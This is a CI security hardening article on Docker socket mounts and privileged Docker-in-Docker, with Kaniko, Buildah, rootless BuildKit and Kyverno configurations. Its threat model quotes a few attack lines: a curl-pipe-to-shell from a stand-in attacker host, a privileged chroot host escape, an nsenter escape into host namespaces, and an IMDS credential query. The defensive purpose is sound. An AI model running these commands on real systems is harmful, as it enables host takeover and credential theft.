Docker-in-Docker and the Shared Kernel Double Bind: Why --privileged in CI Is Host Root
The Problem
Building container images in CI requires a container build tool running inside the CI environment — which is itself, in almost every modern Kubernetes-based CI system, a container. This creates a structural problem: how does a process running inside a container build another container image? Three patterns emerged historically, and understanding why the first two remain widespread is important context for understanding why they persist despite being security disasters.
Pattern 1: Docker Socket Mount
The CI job container has /var/run/docker.sock mounted from the host. Any docker build, docker push, or docker run command inside the CI job connects directly to the host Docker daemon via the Unix domain socket. This is not Docker-in-Docker — there is no inner Docker daemon — but it is strictly worse from a security perspective because the docker CLI binary in the container is just a thin client: all operations execute in the context of the host daemon running as root.
What this concretely grants to the CI job:
- Arbitrary privileged container creation on the host.
docker run --privileged -v /:/host alpine chroot /hostruns as root with full host filesystem access. One command, executed from inside the CI container, gives you a root shell on the Kubernetes node. - Full read access to all running containers’ environments.
docker inspectagainst any container ID on the host returns the full environment variable set for that container, including secrets injected as environment variables by Kubernetes, CI orchestrators, or other build jobs. - Host credential access. The Docker daemon runs with the node’s Docker Hub, ECR, GCR, or other registry credentials cached in
/root/.docker/config.json. A CI job with socket access can read those credentials directly or use them implicitly viadocker pull. - Full Docker API access. Volumes, networks, secrets (Docker Swarm secrets), configs — everything the Docker daemon manages is accessible.
The RUN steps in a Dockerfile execute inside ephemeral containers created by the daemon. If a Dockerfile contains RUN curl https://attacker.example.com/payload.sh | sh, that command runs in a container managed by the host daemon. With socket mount, the attacker payload executes with the full capabilities of a container spawned by root — not inside a sandboxed nested container.
This pattern became popular because it is simple: mount the socket, use docker build as-is. CI systems like early Jenkins pipelines and Docker Compose-based CI environments standardised on it. GitLab’s documentation recommended it for years. It remains the default in many internal CI configurations because engineers set it up five years ago and it worked, and no one audited the security implications.
Pattern 2: Docker-in-Docker (–privileged)
A Docker daemon runs inside the CI container. To give this inner daemon the kernel capabilities it needs — mounting overlay filesystems, manipulating cgroup hierarchies, creating network namespaces — the outer container is started with --privileged.
--privileged does three distinct things, each of which individually destroys container isolation:
- Grants all Linux capabilities. A non-privileged container has a restricted capability set.
--privilegedaddsCAP_SYS_ADMIN,CAP_NET_ADMIN,CAP_SYS_PTRACE,CAP_SYS_MODULE, and all other capabilities in the full set.CAP_SYS_ADMINalone is effectively root — it allows mounting arbitrary filesystems, manipulating namespaces, and loading kernel modules. - Disables seccomp filtering. The seccomp profile that restricts the system calls a container can invoke is removed entirely. Every system call in the kernel ABI is available to processes inside the container.
- Disables AppArmor and SELinux MAC enforcement. The Mandatory Access Control profiles that constrain what files and devices a container can access are not applied.
The result is a container that shares the host kernel and has no meaningful restrictions beyond what the kernel itself imposes on a root process. A container with --privileged is not “root with elevated permissions” — it is root on the host, expressed through a user namespace that provides minimal additional protection.
The security distinction between --privileged DinD and the socket mount pattern is narrow in practice: the socket mount is a direct path to the host daemon; --privileged DinD provides a slightly indirect path via kernel CVE exploitation or the nsenter technique. With --privileged, nsenter --target 1 --mount --uts --ipc --net --pid -- bash joins the PID 1 (host init) namespace from inside the container. This is a documented, trivial escape requiring zero kernel vulnerabilities.
The DinD pattern was popularised by Jérôme Petazzoni’s 2013 blog post “Using Docker-in-Docker for your CI or testing environment” — the same author who later wrote a follow-up explicitly recommending against it for CI use. GitLab’s own documentation for their Docker executor still recommends privileged = true in the runner configuration as the supported approach for building Docker images. This is documented host compromise as an official configuration.
Pattern 3: The Correct Approach
Three production tools build OCI-compliant container images without requiring a Docker daemon, without --privileged, and without mounting the host socket. All three operate in userspace and use only unprivileged kernel facilities.
Kaniko (Google, 2018): Reads a Dockerfile and builds layers directly in userspace by unpacking base image layers to a directory, executing RUN commands with chroot into that directory, and snapshotting filesystem changes between steps using file modification timestamps and hash comparisons. The built image is pushed directly to a registry. Kaniko does not start a Docker daemon. The executor container does run as root inside the container (it needs to chroot and manipulate filesystem ownership), but it does not require --privileged and does not require kernel mount operations. The container can drop all Linux capabilities except those strictly needed for chroot operations.
Buildah (Red Hat, 2017): Builds OCI images without a daemon, supports rootless mode using kernel user namespace remapping (newuidmap/newgidmap). In rootless mode, the build process runs as a non-root user on the host and uses user namespace remapping to simulate root inside the build environment. Buildah supports a --isolation chroot mode that replaces kernel namespace creation with plain chroot, enabling builds in environments that do not permit user namespace creation. Buildah also supports OCI and Docker image formats, multiple transport protocols, and scripted builds via shell scripts rather than Dockerfiles.
BuildKit in rootless mode (Moby, docker/buildx): BuildKit is the build backend for docker buildx and can run as a standalone daemon (buildkitd) in rootless mode. Rootless BuildKit runs the build daemon as a non-root user using user namespaces, with no privileged operations required. The --oci-worker-no-process-sandbox flag trades kernel namespace sandboxing for a seccomp-only sandbox — lower isolation but broader compatibility across kernel configurations. GitHub-hosted Actions runners use BuildKit rootless mode automatically for the docker/build-push-action.
Threat Model
Docker socket mount — full host daemon access from any RUN step. The attack surface is every line of a Dockerfile, every build dependency pulled during the build, and every environment variable injected into the build environment. A poisoned base image (FROM malicious-base:latest) that has replaced a binary with a backdoored version will execute during the build with access to the host Docker socket. A compromised npm package pulled during RUN npm install executes its install scripts with socket access. A supply chain compromise upstream of the build — a poisoned layer in any transitive base image — executes with full host daemon access. The attacker does not need to compromise the CI infrastructure; they need to compromise one artifact in the build’s dependency graph.
--privileged DinD — kernel CVE exploitation reaches the Kubernetes node directly. CVE-2022-0847 (Dirty Pipe) demonstrated the class of vulnerability relevant here: a kernel vulnerability exploitable from inside a container that grants overwrite access to arbitrary read-only files, including the host’s /etc/passwd, /proc/sched_debug, and SUID binaries. Dirty Pipe was exploitable from inside --privileged containers — the container shares the kernel, so kernel vulnerabilities have the same exploitability profile as from the host. An attacker running arbitrary code inside the inner Docker environment (via a compromised build step) can exploit kernel vulnerabilities to reach the outer host without needing a container escape first, because --privileged has already removed the barriers.
The nsenter escape requires no kernel vulnerability. Any process inside a --privileged container can join the host’s PID namespace and execute commands with full host access in approximately two commands. This is not exploitation — it is intended kernel namespace functionality working correctly.
Node compromise in a shared build cluster — the blast radius is every secret on the node. In a Kubernetes cluster where multiple teams’ build jobs run on shared nodes, one compromised build job that achieves host access on its node can access:
- All other pods’ environment variables.
crictl inspect <pod-id>on the node returns environment variables for every running pod, including those in different namespaces. In a busy build cluster, this includes other teams’GITHUB_TOKENs, AWS credentials, Docker Hub passwords, and deployment keys currently in use. - Kubelet credentials. The kubelet’s client certificate and key are stored on the node at
/var/lib/kubelet/pki/. These credentials authenticate to the Kubernetes API server with the node’s identity. Depending on RBAC configuration, the node identity may permit reading secrets across namespaces. - Cloud IMDS credentials. Cloud providers’ Instance Metadata Service endpoints (
169.254.169.254for AWS, Azure;metadata.google.internalfor GCP) are accessible from the node and return credentials scoped to the node’s IAM role. The node IAM role in many Kubernetes deployments has broad permissions to support node operations. In AWS, this typically includesecr:GetAuthorizationTokenand may includes3:*,secretsmanager:GetSecretValue, or broader IAM permissions depending on how the cluster was configured. - Registry credentials cached on the node. Docker and containerd cache registry authentication tokens. On a node that has pulled images from ECR, the cached token from
/root/.docker/config.jsonor containerd’s credential cache grantsdocker pullaccess to every image in the account until the token expires.
GitLab CI Docker executor with privileged = true. GitLab’s official documentation for building Docker images in CI pipelines using the Docker executor reads: “Make the Docker executor privileged.” The config.toml snippet provided in the documentation contains privileged = true. This configuration applies to all jobs on that runner, not just image-building jobs. Any job that runs on a privileged runner — including jobs that do nothing more than run unit tests — runs in a --privileged container with full host access. GitLab groups can contain hundreds of repositories, and runners are frequently shared. A malicious actor who can push a branch to any repository in the group can trigger a CI job on the privileged runner, escape to the host, and access secrets from all other concurrent jobs.
Supply chain via poisoned base image with socket access. A build pipeline that uses FROM python:3.12-slim and mounts the Docker socket is trusting the security of the python image on Docker Hub, the security of Docker Hub’s image signing infrastructure, and the security of every layer in the image’s history. The python:3.12-slim image has hundreds of transitive dependencies. A compromise of any layer that executes code during the build (e.g., via a package manager in the base image that runs scripts) gives socket access. The Codecov breach (2021) demonstrated that even widely-trusted CI tooling with millions of installations can be compromised to exfiltrate credentials. A similarly-scoped compromise of a base image used in a socket-mounted build environment gives full host access rather than credential exfiltration.
Hardening Configuration
1. Kaniko in Kubernetes — No Privileged Required
Kaniko runs as a Kubernetes Pod with no special privileges. Registry credentials are passed via a Kubernetes Secret mounted as a volume.
apiVersion: v1
kind: Secret
metadata:
name: registry-credentials
namespace: ci-builds
type: kubernetes.io/dockerconfigjson
data:
.dockerconfigjson: <base64-encoded-docker-config-json>
---
apiVersion: v1
kind: Pod
metadata:
name: kaniko-build
namespace: ci-builds
spec:
initContainers:
- name: git-clone
image: alpine/git:latest
command:
- git
- clone
- https://github.com/myorg/myrepo
- /workspace
volumeMounts:
- name: workspace
mountPath: /workspace
securityContext:
runAsNonRoot: true
runAsUser: 1000
allowPrivilegeEscalation: false
capabilities:
drop: ["ALL"]
containers:
- name: kaniko
image: gcr.io/kaniko-project/executor:v1.23.0
args:
- "--dockerfile=/workspace/Dockerfile"
- "--context=dir:///workspace"
- "--destination=myregistry.io/myimage:latest"
- "--cache=true"
- "--cache-repo=myregistry.io/myimage/cache"
- "--cleanup"
volumeMounts:
- name: workspace
mountPath: /workspace
- name: registry-credentials
mountPath: /kaniko/.docker
securityContext:
# Kaniko requires root inside the container for chroot operations,
# but does NOT require --privileged or any elevated capabilities
runAsNonRoot: false
runAsUser: 0
allowPrivilegeEscalation: false
capabilities:
drop: ["ALL"]
# Kaniko needs CHOWN and FSETID to correctly set file ownership
# in built image layers
add: ["CHOWN", "FSETID", "DAC_OVERRIDE"]
seccompProfile:
type: RuntimeDefault
volumes:
- name: workspace
emptyDir: {}
- name: registry-credentials
secret:
secretName: registry-credentials
items:
- key: .dockerconfigjson
path: config.json
restartPolicy: Never
serviceAccountName: kaniko-builder
automountServiceAccountToken: false
Key points: allowPrivilegeEscalation: false prevents the executor from gaining additional privileges beyond what it starts with. seccompProfile: RuntimeDefault applies the container runtime’s default seccomp profile, restricting available system calls to a vetted list. No hostPath volumes. No socket mount. automountServiceAccountToken: false prevents the build pod from authenticating to the Kubernetes API — the build job does not need cluster access.
For temporary credentials (AWS ECR, GCR with Workload Identity), use a credential helper as an init container that writes a short-lived config.json to a shared emptyDir volume:
initContainers:
- name: ecr-credentials
image: amazon/aws-cli:latest
command:
- sh
- -c
- |
aws ecr get-login-password --region us-east-1 \
| jq -Rn --arg token "$(cat)" \
'{"auths":{"123456789.dkr.ecr.us-east-1.amazonaws.com":{"auth":($token|@base64)}}}' \
> /kaniko/.docker/config.json
volumeMounts:
- name: docker-config
mountPath: /kaniko/.docker
securityContext:
runAsNonRoot: true
allowPrivilegeEscalation: false
capabilities:
drop: ["ALL"]
2. Buildah Rootless in GitLab CI
Buildah supports a chroot isolation mode that avoids kernel namespace creation entirely. Combined with the vfs storage driver, this produces builds that work inside standard unprivileged containers.
# .gitlab-ci.yml
build:
image: quay.io/buildah/stable:v1.35.0
variables:
# chroot isolation: use chroot(2) instead of creating kernel namespaces.
# Works in unprivileged containers. Slightly less isolation than
# namespace-based isolation but requires no special kernel permissions.
BUILDAH_ISOLATION: chroot
# vfs storage driver: plain directory tree with full copies between layers.
# No overlay mount operations, no kernel mount capabilities required.
# Significantly slower than overlay but works without privileges.
STORAGE_DRIVER: vfs
# Disable overlay in storage config entirely
BUILDAH_FORMAT: oci
script:
- buildah bud --isolation chroot --storage-driver vfs -t myimage:latest .
- buildah push --creds "$REGISTRY_USER:$REGISTRY_PASSWORD" \
myimage:latest \
docker://myregistry.io/myimage:$CI_COMMIT_SHORT_SHA
- buildah push --creds "$REGISTRY_USER:$REGISTRY_PASSWORD" \
myimage:latest \
docker://myregistry.io/myimage:latest
The BUILDAH_ISOLATION=chroot variable tells Buildah to use chroot(2) for build step isolation rather than creating new user, mount, and network namespaces. This is less isolation than full namespace separation — processes inside RUN steps can see the host’s PID namespace and network interfaces — but it is functionally equivalent to the isolation provided by Docker’s default (non-privileged) container builds, and it requires no elevated kernel permissions.
STORAGE_DRIVER=vfs tells Buildah to use plain directory copies between layers rather than overlay filesystem mounts. This means each layer is a full copy of the previous layer’s directory tree rather than a copy-on-write overlay. For large images (e.g., images with a 1 GB base layer), this increases build time and disk usage substantially. For small images, the difference is acceptable.
For environments where user namespaces are available (kernels with CONFIG_USER_NS=y and kernel.unprivileged_userns_clone=1), Buildah rootless with overlay provides better performance and the stronger isolation of namespace separation:
# /etc/containers/storage.conf inside the Buildah container image
# (configure via a custom image or mounted configmap)
[storage]
driver = "overlay"
[storage.options.overlay]
mount_program = "/usr/bin/fuse-overlayfs"
fuse-overlayfs implements overlay filesystem semantics in userspace via FUSE, avoiding the kernel-level mount(2) operations that require privileges.
3. BuildKit Rootless in GitHub Actions and Self-Hosted Runners
GitHub-hosted ubuntu-* runners run BuildKit in rootless mode automatically when using docker/build-push-action. The action creates a BuildKit builder container using docker buildx create, which manages the buildkitd daemon in rootless mode.
# .github/workflows/build.yml
name: Build and Push Image
on:
push:
branches: [main]
permissions:
contents: read
id-token: write # Required for OIDC registry authentication
jobs:
build:
runs-on: ubuntu-24.04
steps:
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
# actions/checkout v4.2.2 pinned by SHA
- name: Configure AWS credentials via OIDC
uses: aws-actions/configure-aws-credentials@e3dd6a429d7300a6a4c196c26e071d42e0343502
with:
role-to-assume: arn:aws:iam::123456789:role/ci-image-push
aws-region: us-east-1
- name: Login to Amazon ECR
id: ecr-login
uses: aws-actions/amazon-ecr-login@062b18b96a7aff071d4dc91bc00c4c1a7945b076
- name: Set up Docker Buildx
uses: docker/setup-buildx-action@b5ca514318bd6ebac0fb2aedd5d36ec1b5c232a2
with:
# Explicitly use rootless mode. The default on GitHub-hosted runners
# already uses rootless, but this makes it explicit and auditable.
driver: docker-container
driver-opts: |
image=moby/buildkit:v0.18.2
network=host
- name: Build and push
uses: docker/build-push-action@14487ce63c7a62a4a324b0bfb37086795e31c6c1
with:
context: .
push: true
tags: |
${{ steps.ecr-login.outputs.registry }}/myimage:${{ github.sha }}
${{ steps.ecr-login.outputs.registry }}/myimage:latest
cache-from: type=registry,ref=${{ steps.ecr-login.outputs.registry }}/myimage:buildcache
cache-to: type=registry,ref=${{ steps.ecr-login.outputs.registry }}/myimage:buildcache,mode=max
provenance: true
sbom: true
For self-hosted runners where rootless mode needs explicit configuration, create a rootless BuildKit builder manually:
# On the self-hosted runner host, as a non-root user
docker buildx create \
--name rootless-builder \
--driver docker-container \
--driver-opt image=moby/buildkit:v0.18.2,network=host \
--use
# Verify the builder runs without --privileged
docker inspect buildx_buildkit_rootless-builder0 \
--format '{{ .HostConfig.Privileged }}'
# Expected output: false
# Verify no capability additions
docker inspect buildx_buildkit_rootless-builder0 \
--format '{{ .HostConfig.CapAdd }}'
# Expected output: []
For environments where user namespaces are not available (some hardened Kubernetes configurations disable kernel.unprivileged_userns_clone), the --oci-worker-no-process-sandbox flag runs BuildKit build steps with seccomp-only sandboxing instead of full namespace isolation:
docker buildx create \
--name compatible-builder \
--driver docker-container \
--driver-opt image=moby/buildkit:v0.18.2 \
--driver-opt "env.BUILDKITD_FLAGS=--oci-worker-no-process-sandbox" \
--use
This reduces isolation: build steps share the PID and network namespaces of the BuildKit daemon rather than running in isolated namespaces. It is still substantially more secure than --privileged DinD because the daemon itself runs without elevated host privileges.
4. OPA/Kyverno Policy: Block Docker Socket Mounts and --privileged at Admission
Admission control prevents the configuration from ever reaching production. Deploy as a Kyverno ClusterPolicy in Enforce mode so that pods violating the policy are rejected at the API server rather than audited after the fact.
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: block-privileged-builds
annotations:
policies.kyverno.io/title: Block Privileged Containers and Docker Socket Mounts
policies.kyverno.io/description: >
Privileged containers and Docker socket mounts grant full host access.
Image builds must use Kaniko, Buildah, or rootless BuildKit.
spec:
validationFailureAction: Enforce
background: true
rules:
- name: block-privileged
match:
any:
- resources:
kinds: [Pod]
validate:
message: >
Privileged containers are not permitted. Use Kaniko, Buildah with
BUILDAH_ISOLATION=chroot, or rootless BuildKit for image builds.
See https://systemshardening.com/articles/cicd/docker-in-docker-shared-kernel-risk/
pattern:
spec:
=(initContainers):
- =(securityContext):
=(privileged): "false"
containers:
- =(securityContext):
=(privileged): "false"
=(ephemeralContainers):
- =(securityContext):
=(privileged): "false"
- name: block-docker-socket-hostpath
match:
any:
- resources:
kinds: [Pod]
validate:
message: >
Mounting /var/run/docker.sock grants full host Docker daemon access.
Remove the hostPath volume mount and use Kaniko or Buildah for image builds.
deny:
conditions:
any:
- key: "/var/run/docker.sock"
operator: AnyIn
value: "{{ request.object.spec.volumes[].hostPath.path | [?@ != null] }}"
- key: "/run/docker.sock"
operator: AnyIn
value: "{{ request.object.spec.volumes[].hostPath.path | [?@ != null] }}"
- name: block-containerd-socket-hostpath
match:
any:
- resources:
kinds: [Pod]
validate:
message: >
Mounting the container runtime socket (/run/containerd/containerd.sock)
grants host container runtime access equivalent to Docker socket access.
deny:
conditions:
any:
- key: "/run/containerd/containerd.sock"
operator: AnyIn
value: "{{ request.object.spec.volumes[].hostPath.path | [?@ != null] }}"
- name: require-drop-all-capabilities
match:
any:
- resources:
kinds: [Pod]
namespaces: [ci-builds]
validate:
message: >
All containers in the ci-builds namespace must drop ALL capabilities.
If a specific capability is required, add it explicitly with justification.
pattern:
spec:
containers:
- securityContext:
capabilities:
drop: ["ALL"]
The policy also blocks /run/containerd/containerd.sock mounts. Mounting the containerd socket is equivalent to mounting the Docker socket — it provides direct access to the container runtime’s gRPC API, which can be used to create privileged containers, read container filesystem contents, and inject processes into running containers.
Apply the policy and immediately test it:
# Apply the policy
kubectl apply -f block-privileged-builds.yaml
# Test: attempt to create a privileged pod — should be rejected
kubectl run test-privileged \
--image=alpine \
--overrides='{"spec":{"containers":[{"name":"test","image":"alpine","securityContext":{"privileged":true}}]}}' \
--namespace=ci-builds
# Expected output:
# Error from server: admission webhook "validate.kyverno.svc-fail" denied the request:
# resource Pod/ci-builds/test-privileged was blocked due to the following policies
# block-privileged-builds/block-privileged:
# Privileged containers are not permitted. Use Kaniko, Buildah with
# BUILDAH_ISOLATION=chroot, or rootless BuildKit for image builds.
5. Dedicated Build Namespace with Network Policy for Legacy Migrations
When a migration from --privileged builds cannot be completed immediately, contain the blast radius. Isolate build workloads on dedicated nodes with taints and apply network egress restrictions that prevent the build node from reaching internal services.
# Taint dedicated build nodes so only build pods schedule there
kubectl taint nodes build-node-1 build-node-2 \
role=privileged-builds:NoSchedule
# Label the nodes
kubectl label nodes build-node-1 build-node-2 \
node-role=privileged-builds
# Toleration required on build pods to schedule on tainted nodes
spec:
tolerations:
- key: "role"
operator: "Equal"
value: "privileged-builds"
effect: "NoSchedule"
nodeSelector:
node-role: privileged-builds
---
# NetworkPolicy: deny egress from ci-builds-legacy namespace to internal services
# Builds should only need to reach: git hosts, package registries, container registries
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: build-egress-restrictions
namespace: ci-builds-legacy
spec:
podSelector: {}
policyTypes: [Egress]
egress:
# Allow DNS
- ports:
- port: 53
protocol: UDP
- port: 53
protocol: TCP
# Allow HTTPS to external hosts (package registries, git hosts, container registries)
- ports:
- port: 443
protocol: TCP
# Block access to cloud IMDS (169.254.169.254)
# Note: this is a NetworkPolicy allowlist — the IMDS IP is not listed,
# so connections to it are denied
# Block access to internal Kubernetes API server explicitly
# by NOT including the cluster CIDR in allowed destinations
The IMDS block is important. If a --privileged build escapes to the node, the first thing an attacker’s tooling will do is query http://169.254.169.254/latest/meta-data/iam/security-credentials/ to obtain temporary cloud credentials. While a NetworkPolicy does not constrain root processes that have escaped the container namespace, it does constrain network traffic from build pods that have not yet escaped — preventing a less sophisticated attack from reaching the IMDS without full container escape.
For the kubelet credential threat, there is no NetworkPolicy mitigation once a container has --privileged and has escaped to the node. The only mitigations are: use node-level RBAC to minimise what the kubelet identity can access, enable Kubernetes audit logging to detect anomalous API calls from node identities, and migrate off --privileged as a priority.
Expected Behaviour
Kaniko Build — No Privileged Capabilities
After creating the Kaniko build pod, inspect the container’s capability set:
# From inside the Kaniko container, before the build starts
kubectl exec -it kaniko-build -n ci-builds -- \
cat /proc/self/status | grep Cap
# Expected output (capabilities dropped to minimum):
# CapInh: 0000000000000000
# CapPrm: 00000000000000d4 # CAP_DAC_OVERRIDE, CAP_FSETID, CAP_CHOWN
# CapEff: 00000000000000d4
# CapBnd: 00000000000000d4
# CapAmb: 0000000000000000
Decode the hex value to confirm which capabilities are present:
capsh --decode=00000000000000d4
# Output: 0x00000000000000d4=cap_chown,cap_dac_override,cap_fsetid
Compare with a --privileged container:
# Inside a --privileged container
cat /proc/self/status | grep Cap
# CapPrm: 000001ffffffffff # All capabilities
# CapEff: 000001ffffffffff
The full capability set (0x1ffffffffff) includes CAP_SYS_ADMIN, CAP_SYS_PTRACE, CAP_NET_ADMIN, CAP_SYS_MODULE, and all others. The Kaniko container has only three, all scoped to filesystem ownership operations needed for correct layer construction.
Kyverno Policy Denial
When a CI job attempts to create a --privileged pod in the ci-builds namespace, the API server returns:
Error from server: admission webhook "validate.kyverno.svc-fail" denied the request:
resource Pod/ci-builds/my-dind-build was blocked due to the following policies
block-privileged-builds/block-privileged:
Privileged containers are not permitted. Use Kaniko, Buildah with
BUILDAH_ISOLATION=chroot, or rootless BuildKit for image builds.
See https://systemshardening.com/articles/cicd/docker-in-docker-shared-kernel-risk/
This message should appear in the CI job log and be immediately actionable: the job fails with a policy violation, not a vague permission error.
Verifying No Docker Socket Presence
In a correctly-configured Kaniko or Buildah pod, the Docker socket should not be present:
kubectl exec -it kaniko-build -n ci-builds -- ls -la /var/run/docker.sock
# ls: /var/run/docker.sock: No such file or directory
kubectl exec -it kaniko-build -n ci-builds -- ls -la /run/docker.sock
# ls: /run/docker.sock: No such file or directory
If either path exists, a Docker socket mount is present and the configuration is incorrect.
Trade-offs
Kaniko works for the majority of Dockerfiles but has documented feature gaps relative to the Docker daemon build engine. The --mount=type=cache Dockerfile instruction for build caches was not supported until relatively recent versions; --mount=type=tmpfs and --mount=type=bind have had varying support across releases. Kaniko’s snapshot mechanism (comparing file modification timestamps and hashes between layers) can produce incorrect results for builds that modify files without changing their timestamps — a rare but documented issue. Kaniko’s layer cache is stored in a registry rather than on the build node, which means cache hits require a registry round-trip; cold starts are slower than Docker’s local layer cache. Verify Dockerfile compatibility with Kaniko’s documented unsupported features list before migrating production builds.
Buildah with STORAGE_DRIVER=vfs is significantly slower than overlay-based builds because every layer transition requires a full directory copy rather than a copy-on-write operation. For a build with a 500 MB base image and five RUN layers, vfs storage may require 2-3 GB of disk I/O per build where overlay would require a fraction of that. This is acceptable for small images and low-concurrency builds but can cause disk pressure in high-throughput build clusters. If the runner environment supports fuse-overlayfs, use it. If not, monitor disk usage and build duration carefully.
Rootless BuildKit requires CONFIG_USER_NS=y in the kernel and kernel.unprivileged_userns_clone=1 if the distribution kernel disables it by default. Debian and Ubuntu kernels enable this by default; some hardened distributions (RHEL/CentOS with certain security profiles, hardened Debian) disable it. Check before relying on rootless mode in self-hosted environments:
cat /proc/sys/kernel/unprivileged_userns_clone
# 1 = user namespaces available to unprivileged users
# 0 = user namespaces restricted — rootless BuildKit will not function
The --oci-worker-no-process-sandbox workaround allows BuildKit to run without user namespaces, but at reduced isolation. This is a deployment-time decision, not a build-time one — the security properties of the build environment change based on whether the flag is set.
All three tools add operational complexity compared to docker build. Build time differences are real. Cache behaviour differs from Docker’s local layer cache. Dockerfile compatibility requires testing. These are accepted costs for eliminating host root access from build infrastructure. The alternative cost — a single compromised build dependency reaching all secrets in your CI cluster — is not bounded.
Failure Modes
Using docker:dind without reading what it requires. The official docker:dind image is designed for running a Docker daemon inside a container. It works correctly only with --privileged. The image’s documentation and Docker Hub page state this. CI configurations that add this image without understanding its requirements end up with --privileged pods, sometimes in namespaces that were not intended to allow it. The failure mode is silent: the build works correctly, --privileged is present, and the security team discovers this six months later during an audit.
Assuming Kaniko is a drop-in Dockerfile replacement without testing. Kaniko implements a large subset of Dockerfile syntax but not all of it. Builds that use RUN --mount=type=cache for Go module or npm package caching, builds that use complex COPY --chmod flags, or builds that rely on specific Docker daemon behaviour for multi-stage builds may fail or produce incorrect results. Always run Kaniko against your actual Dockerfiles in a staging environment before removing --privileged from production build pipelines. Track Kaniko’s open issues — some Docker features are open enhancement requests, not temporary gaps.
Mounting the Docker socket “just for CI” without reviewing all build steps. The phrase “just for CI” implies reduced security impact. The opposite is true: CI pipelines pull dependencies, execute third-party code, and build from external base images. The attack surface is larger than production, not smaller. A team that mounts the Docker socket to allow docker build inside their CI containers has granted every RUN step in every Dockerfile, every npm install script, and every build-time tool with shell access the ability to create privileged containers on the Kubernetes node. The socket mount is not scoped to image building operations — it is a credential to the host daemon, usable for any Docker operation.
Treating the build namespace as a less critical namespace and skipping admission control. Kubernetes namespaces provide no security boundary between pods in different namespaces on the same node. A privileged pod in ci-builds can access resources in production if they share a node. The ci-builds namespace is often treated as infrastructure rather than security domain, and admission controllers are deployed in enforcement mode for production and staging while ci-builds remains in audit mode or has exceptions. The correct configuration is enforcement mode in every namespace, including build namespaces — the blast radius of a build compromise is at minimum all other jobs on the same node, and with node-level access, extends to cluster-wide IAM credentials.
Conflating “rootless container” with “safe for CI builds.” Running the CI job container itself as a non-root user does not prevent --privileged from being dangerous. A container running as UID 1000 with --privileged still has all capabilities and all system calls available. --privileged overrides user namespace restrictions. The security properties that matter are the presence or absence of --privileged and the presence or absence of the Docker socket mount — not the UID the container’s entry process runs as.